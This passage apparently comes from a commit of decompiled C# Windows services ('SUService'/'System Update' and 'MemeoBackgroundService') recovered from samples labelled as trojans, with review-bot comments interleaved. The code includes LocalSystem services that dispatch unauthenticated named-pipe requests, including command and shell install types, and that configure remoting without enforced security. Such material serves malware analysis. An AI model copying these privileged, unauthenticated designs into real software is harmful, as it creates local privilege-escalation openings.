private static bool DirectoryExists(string dir) => new DirectoryInfo(dir).Exists;
private static void BuildCommandLine(string[] arguments)
{
int position;
for (position = 1; position < arguments.Length && !arguments[position].StartsWith("/arguments"); ++position)
PipeManager.commandLine = PipeManager.commandLine + arguments[position] + " ";
PipeManager.commandLine = PipeManager.commandLine.Remove(PipeManager.commandLine.Length - 1, 1);
PipeManager.BuildArguments(arguments, position);
}
private static void BuildArguments(string[] args, int position)
{
for (++position; position < args.Length && !args[position].StartsWith("/directory"); ++position)
PipeManager.argumentsValue = PipeManager.argumentsValue + args[position] + " ";
if (PipeManager.argumentsValue != "")
PipeManager.argumentsValue = PipeManager.argumentsValue.Remove(PipeManager.argumentsValue.Length - 1, 1);
PipeManager.BuildDirectoryPath(args, position);
}
private static void BuildDirectoryPath(string[] args, int position)
{
for (++position; position < args.Length && !args[position].StartsWith("/type"); ++position)
PipeManager.directoryPath = PipeManager.directoryPath + args[position] + " ";
PipeManager.installType = args[position + 1];
PipeManager.directoryPath = PipeManager.directoryPath.Remove(PipeManager.directoryPath.Length - 1, 1);
}
private void Start()
{
try
{
while (this._listen)
{
int[] numArray = new int[this.Pipes.Keys.Count];
this.Pipes.Keys.CopyTo((Array) numArray, 0);
foreach (int key in numArray)
{
ServerNamedPipe pipe = (ServerNamedPipe) this.Pipes[(object) key];
if (pipe != null && DateTime.Now.Subtract(pipe.LastAction).Milliseconds > 5000 && ((APipeConnection) pipe.PipeConnection).GetState() != 4)
{
pipe.Listen = false;
pipe.PipeThread.Abort();
this.RemoveServerChannel((object) ((APipeConnection) pipe.PipeConnection).NativeHandle);
}
}
if ((long) this.numChannels <= (long) this.NumberPipes)
{
ServerNamedPipe serverNamedPipe = new ServerNamedPipe(this.PipeName, this.OutBuffer, this.InBuffer, 5000, false);
try
{
serverNamedPipe.Connect();
serverNamedPipe.LastAction = DateTime.Now;
Interlocked.Increment(ref this.numChannels);
serverNamedPipe.Start();
this.Pipes.Add((object) ((APipeConnection) serverNamedPipe.PipeConnection).NativeHandle, (object) serverNamedPipe);
}
catch (InterProcessIOException ex)
{
this.RemoveServerChannel((object) ((APipeConnection) serverNamedPipe.PipeConnection).NativeHandle);
serverNamedPipe.Dispose();
ServiceLogger.Instance.Severe(((Exception) ex).StackTrace.ToString(), (Exception) ex);
}
}
else
{
this.Mre.Reset();
this.Mre.WaitOne(1000, false);
}
}
}
catch (Exception ex)
{
ServiceLogger.Instance.Warning(ex.Message.ToString(), ex);
}
}
public void Stop()
{
this._listen = false;
this.Mre.Set();
try
{
int[] numArray = new int[this.Pipes.Keys.Count];
this.Pipes.Keys.CopyTo((Array) numArray, 0);
foreach (int key in numArray)
((ServerNamedPipe) this.Pipes[(object) key]).Listen = false;
int num = this.numChannels * 3;
for (int index = 0; index < num; ++index)
this.StopServerPipe();
this.Pipes.Clear();
this.Mre.Close();
this.Mre = (ManualResetEvent) null;
}
catch (Exception ex)
{
ServiceLogger.Instance.Warning(ex.Message.ToString(), ex);
}
}
public void WakeUp()
{
if (this.Mre == null)
return;
this.Mre.Set();
}
private void StopServerPipe()
{
try
{
ClientPipeConnection clientPipeConnection = new ClientPipeConnection(this.PipeName);
if (!clientPipeConnection.TryConnect())
return;
((APipeConnection) clientPipeConnection).Close();
}
catch (Exception ex)
{
ServiceLogger.Instance.Warning(ex.Message.ToString(), ex);
}
}
public void RemoveServerChannel(object param)
{
int key = (int) param;
Interlocked.Decrement(ref this.numChannels);
this.Pipes.Remove((object) key);
this.WakeUp();
}
private enum InstallType
{
COMMAND,
SHELL,
INF,
}
}
}
@@ -0,0 +1,147 @@
// Decompiled with JetBrains decompiler
// Type: Tvsu.Service.Server.ServerNamedPipe
// Assembly: SUService, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C794206D-ECC0-4CFA-AB4E-5C06FB2FD4CC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe
using System;
using System.Threading;
using Tvsu.Service.Common.NamedPipes;
namespace Tvsu.Service.Server
{
public sealed class ServerNamedPipe : IDisposable
{
internal Thread PipeThread;
internal ServerPipeConnection PipeConnection;
internal bool Listen = true;
internal DateTime LastAction;
private bool disposed = false;
private void PipeListener()
{
this.CheckIfDisposed();
try
{
this.Listen = TvsuService.PipeManager.Listen;
Console.WriteLine("Pipe " + ((APipeConnection) this.PipeConnection).NativeHandle.ToString() + ": new pipe started" + Environment.NewLine);
while (this.Listen)
{
this.LastAction = DateTime.Now;
string str = ((APipeConnection) this.PipeConnection).Read();
this.LastAction = DateTime.Now;
int nativeHandle;
if (str.Trim() != "")
{
((APipeConnection) this.PipeConnection).Write(TvsuService.PipeManager.HandleRequest(str));
nativeHandle = ((APipeConnection) this.PipeConnection).NativeHandle;
Console.WriteLine("Pipe " + nativeHandle.ToString() + ": request handled" + Environment.NewLine);
}
else
((APipeConnection) this.PipeConnection).Write("Error: bad request");
this.LastAction = DateTime.Now;
this.PipeConnection.Disconnect();
if (this.Listen)
{
nativeHandle = ((APipeConnection) this.PipeConnection).NativeHandle;
Console.WriteLine("Pipe " + nativeHandle.ToString() + ": listening" + Environment.NewLine);
this.Connect();
}
TvsuService.PipeManager.WakeUp();
}
}
catch (ThreadAbortException ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
catch (ThreadStateException ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
catch (Exception ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
finally
{
this.Close();
}
}
internal void Connect()
{
this.CheckIfDisposed();
((APipeConnection) this.PipeConnection).Connect();
}
internal void Close()
{
this.CheckIfDisposed();
this.Listen = false;
TvsuService.PipeManager.RemoveServerChannel((object) ((APipeConnection) this.PipeConnection).NativeHandle);
this.Dispose();
}
internal void Start()
{
this.CheckIfDisposed();
this.PipeThread.Start();
}
private void CheckIfDisposed()
{
if (this.disposed)
throw new ObjectDisposedException(nameof (ServerNamedPipe));
}
public void Dispose()
{
this.Dispose(true);
GC.SuppressFinalize((object) this);
}
private void Dispose(bool disposing)
{
if (!this.disposed)
{
((APipeConnection) this.PipeConnection).Dispose();
if (this.PipeThread != null)
{
try
{
this.PipeThread.Abort();
}
catch (ThreadAbortException ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
catch (ThreadStateException ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
catch (Exception ex)
{
Console.WriteLine(ex.StackTrace.ToString());
}
}
}
this.disposed = true;
}
~ServerNamedPipe() => this.Dispose(false);
internal ServerNamedPipe(
string name,
uint outBuffer,
uint inBuffer,
int maxReadBytes,
bool secure)
{
this.PipeConnection = new ServerPipeConnection(name, outBuffer, inBuffer, maxReadBytes, secure);
this.PipeThread = new Thread(new ThreadStart(this.PipeListener));
this.PipeThread.IsBackground = true;
this.PipeThread.Name = "Pipe Thread " + ((APipeConnection) this.PipeConnection).NativeHandle.ToString();
this.LastAction = DateTime.Now;
}
}
}
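Review bot: `PipeListener` hands whatever `Read()` returns straight to `TvsuService.PipeManager.HandleRequest(str)` after only an empty-string test, and no check of the connected client's identity is visible anywhere in this class. Whether the `secure` constructor argument forwarded to `ServerPipeConnection` restricts the pipe's ACL cannot be seen from here. The request path should verify the caller before dispatch, or at least carry a comment such as `// NOTE(review): request text comes from any client able to open the pipe; verify caller identity before HandleRequest`. Separately, `Dispose(bool disposing)` ignores its argument, so the finalizer also calls `PipeConnection.Dispose()` and `PipeThread.Abort()`; wrapping that work in `if (disposing)` would keep managed objects out of the finalizer path.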
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: Tvsu.Service.Server.ServiceInstaller
// Assembly: SUService, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C794206D-ECC0-4CFA-AB4E-5C06FB2FD4CC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe
using System;
using System.ComponentModel;
using System.Configuration.Install;
using System.Management;
using System.ServiceProcess;
using Tvsu.Service.Common.Util;
namespace Tvsu.Service.Server
{
[RunInstaller(true)]
public class ServiceInstaller : Installer
{
private System.ServiceProcess.ServiceInstaller serviceInstaller1;
private ServiceProcessInstaller serviceProcessInstaller1;
public ServiceInstaller() => this.InitializeComponent();
private void InitializeComponent()
{
this.serviceInstaller1 = new System.ServiceProcess.ServiceInstaller();
this.serviceProcessInstaller1 = new ServiceProcessInstaller();
this.Installers.Clear();
this.serviceInstaller1.DisplayName = "System Update";
this.serviceInstaller1.ServiceName = "SUService";
this.serviceInstaller1.StartType = ServiceStartMode.Automatic;
this.serviceInstaller1.BeforeUninstall += new InstallEventHandler(this.serviceInstaller1_BeforeUninstall);
this.serviceInstaller1.AfterInstall += new InstallEventHandler(this.serviceInstaller1_AfterInstall);
this.serviceProcessInstaller1.Account = ServiceAccount.LocalSystem;
this.serviceProcessInstaller1.Password = (string) null;
this.serviceProcessInstaller1.Username = (string) null;
this.Installers.AddRange(new Installer[2]
{
(Installer) this.serviceProcessInstaller1,
(Installer) this.serviceInstaller1
});
}
private void serviceInstaller1_AfterInstall(object sender, InstallEventArgs e)
{
TvsuService instance = TvsuService.Instance;
try
{
new ManagementScope("root\\CIMV2", new ConnectionOptions()
{
Impersonation = ImpersonationLevel.Impersonate
}).Connect();
ManagementObject managementObject = new ManagementObject("Win32_Service.Name='" + instance.ServiceName + "'");
ManagementBaseObject methodParameters = managementObject.GetMethodParameters("Change");
methodParameters["DesktopInteract"] = (object) true;
managementObject.InvokeMethod("Change", methodParameters, (InvokeMethodOptions) null);
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error using WMI to allow interact with the service", ex);
}
instance.TvsuServiceController.Start();
}
private void serviceInstaller1_BeforeUninstall(object sender, InstallEventArgs e) => TvsuService.Instance.TvsuServiceController.Stop();
}
}
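Review bot: `InitializeComponent` registers the service as `ServiceAccount.LocalSystem` with `ServiceStartMode.Automatic`, and `serviceInstaller1_AfterInstall` then sets `DesktopInteract` to true through WMI, which leaves a SYSTEM process attached to the interactive desktop. A lower-privileged account and no desktop interaction would shrink that exposure; for triage, the install-time markers visible here are the service name `SUService` and the display name `System Update`. In the same handler the connected `ManagementScope` is discarded and never given to the `ManagementObject`, so the `Impersonate` option does not apply to the `Change` call, and the return value of `InvokeMethod` is not checked. Constructing the object as `new ManagementObject(scope, new ManagementPath(...), null)` would tie the two together.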
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>SUService</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>Tvsu.Service.Server</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Configuration.Install" />
<Reference Include="System.Management" />
<Reference Include="System.ServiceProcess" />
</ItemGroup>
<ItemGroup>
<Compile Include="PipeManager.cs" />
<Compile Include="ServerNamedPipe.cs" />
<Compile Include="ServiceInstaller.cs" />
<Compile Include="TvsuService.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SUService", "Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.csproj", "{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}.Debug|Any CPU.Build.0 = Debug|Any CPU
{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}.Release|Any CPU.ActiveCfg = Release|Any CPU
{A425B86D-AA27-4A0C-BAB5-ACA950E26D63}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,74 @@
// Decompiled with JetBrains decompiler
// Type: Tvsu.Service.Server.TvsuService
// Assembly: SUService, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C794206D-ECC0-4CFA-AB4E-5C06FB2FD4CC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe
using System;
using System.ServiceProcess;
using Tvsu.Service.Common.InterProcessComm;
using Tvsu.Service.Common.Util;
namespace Tvsu.Service.Server
{
public class TvsuService : ServiceBase
{
private ServiceController serviceController1;
private static TvsuService instance = (TvsuService) null;
public static IChannelManager PipeManager;
private TvsuService() => this.InitializeComponent();
private static void Main() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new TvsuService()
});
public static TvsuService Instance
{
get
{
if (TvsuService.instance == null)
TvsuService.instance = new TvsuService();
return TvsuService.instance;
}
}
public ServiceController TvsuServiceController => this.serviceController1;
private void InitializeComponent()
{
this.serviceController1 = new ServiceController("SUService", ".");
this.ServiceName = "SUService";
}
protected override void OnStart(string[] args)
{
try
{
TvsuService.PipeManager = (IChannelManager) new Tvsu.Service.Server.PipeManager();
TvsuService.PipeManager.Initialize();
ServiceLogger.Instance.Info("Start service");
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error on starting service", ex);
}
}
protected override void OnStop()
{
try
{
if (TvsuService.PipeManager == null)
return;
TvsuService.PipeManager.Stop();
ServiceLogger.Instance.Info("Stop service");
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error on stop service", ex);
}
}
}
}
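Review bot: `OnStart` catches every exception from creating and initializing `PipeManager` and only logs it, so the service control manager reports a running service even when no pipe listener exists; adding `throw;` after the `Severe` call would let the start fail visibly. `Main` also builds its own `new TvsuService()` instead of using `Instance`, so the lazily created singleton is a different object from the one the SCM runs, and its null check is not guarded against concurrent first use. Using `(ServiceBase) TvsuService.Instance` in `Main` would keep the two the same.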
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyProduct("MemeoBackgroundService")]
[assembly: AssemblyFileVersion("2.0.0.1")]
[assembly: Guid("51c8eb66-1230-443d-978b-0c37845e7d11")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © Memeo 2008")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyCompany("Memeo")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyTitle("MemeoBackgroundService")]
[assembly: AssemblyVersion("2.0.0.1")]
@@ -0,0 +1,69 @@
// Decompiled with JetBrains decompiler
// Type: MemeoBackgroundService.ProjectInstaller
// Assembly: MemeoBackgroundService, Version=2.0.0.1, Culture=neutral, PublicKeyToken=null
// MVID: CEE04D16-EE80-4DF1-BC73-2B3D265B7030
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1.exe
using System;
using System.Collections;
using System.ComponentModel;
using System.Configuration.Install;
using System.ServiceProcess;
namespace MemeoBackgroundService
{
[RunInstaller(true)]
public class ProjectInstaller : Installer
{
private IContainer components = (IContainer) null;
private ServiceProcessInstaller serviceProcessInstaller;
private ServiceInstaller serviceInstaller;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.serviceProcessInstaller = new ServiceProcessInstaller();
this.serviceInstaller = new ServiceInstaller();
this.serviceProcessInstaller.Account = ServiceAccount.LocalSystem;
this.serviceProcessInstaller.Password = (string) null;
this.serviceProcessInstaller.Username = (string) null;
this.serviceInstaller.DisplayName = "Memeo Background Service";
this.serviceInstaller.ServiceName = "MemeoBackgroundService";
this.serviceInstaller.StartType = ServiceStartMode.Automatic;
this.Installers.AddRange(new Installer[2]
{
(Installer) this.serviceProcessInstaller,
(Installer) this.serviceInstaller
});
}
public ProjectInstaller() => this.InitializeComponent();
protected override void OnCommitted(IDictionary savedState)
{
base.OnCommitted(savedState);
try
{
new ServiceController("MemeoBackgroundService").Start();
}
catch (Exception ex)
{
throw new InstallException("Failed to start the service!");
}
}
public override void Uninstall(IDictionary savedState) => base.Uninstall(savedState);
protected override void OnCommitting(IDictionary savedState) => base.OnCommitting(savedState);
protected override void OnBeforeInstall(IDictionary savedState) => base.OnBeforeInstall(savedState);
public override void Install(IDictionary stateSaver) => base.Install(stateSaver);
}
}
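Review bot: The `catch` in `OnCommitted` discards the caught exception, so an install log only ever shows "Failed to start the service!" without the cause; pass it along with `throw new InstallException("Failed to start the service!", ex);`. The `ServiceController` created there is never disposed, which `using (ServiceController sc = new ServiceController("MemeoBackgroundService")) sc.Start();` would fix. `InitializeComponent` also installs the service as `ServiceAccount.LocalSystem` with automatic start, which deserves a comment stating why that level of privilege is required.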
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,64 @@
// Decompiled with JetBrains decompiler
// Type: RemoteServerService.MemeoBackgroundService
// Assembly: MemeoBackgroundService, Version=2.0.0.1, Culture=neutral, PublicKeyToken=null
// MVID: CEE04D16-EE80-4DF1-BC73-2B3D265B7030
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-7baf9cb6986a2764176ef57b9ea6985a0cc189acc05703abad9996ef80e59ac1.exe
using MemeoRemoteCore.Logging;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.Remoting;
using System.ServiceProcess;
namespace RemoteServerService
{
internal class MemeoBackgroundService : ServiceBase
{
private Container components = (Container) null;
public MemeoBackgroundService() => this.InitializeComponent();
private static void Main() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new MemeoBackgroundService()
});
private void InitializeComponent()
{
this.CanHandlePowerEvent = true;
this.ServiceName = nameof (MemeoBackgroundService);
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
protected override void OnStart(string[] args)
{
try
{
Logger.InitializeLogger();
Logger.LogInfo("**********************Logger initialized(new instance of the Service)*******************");
Logger.LogInfo("Configuring Remote Server...");
RemotingConfiguration.Configure(Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location) + "\\MemeoBackgroundService.exe.config", false);
Logger.LogInfo("Done configuring.");
this.EventLog.WriteEntry("Memeo Background Service Started!", EventLogEntryType.Information);
}
catch (Exception ex)
{
Logger.LogError("Service Start failure: " + ex.Message + " " + ex.StackTrace);
this.EventLog.WriteEntry("Problem starting Memeo Background Service :" + ex.Message + ex.StackTrace, EventLogEntryType.Error);
}
}
protected override void OnStop() => this.EventLog.WriteEntry("Memeo Background Service Stopped!", EventLogEntryType.Information);
protected override bool OnPowerEvent(PowerBroadcastStatus powerStatus) => base.OnPowerEvent(powerStatus);
}
}
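Review bot: `OnStart` calls `RemotingConfiguration.Configure(..., false)`, and that second argument is `ensureSecurity`, so the remoting channels defined in `MemeoBackgroundService.exe.config` are not required to be secured; passing `true` is the safer default. What the config file exposes is not visible in this hunk, but `ProjectInstaller` in this commit installs the service as LocalSystem, so the channel binding and the ACL on that file should both be reviewed. The catch block logs the failure and returns, which leaves the service reported as started with remoting unconfigured. The path would also be clearer as `Path.Combine(Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location), "MemeoBackgroundService.exe.config")`.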
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
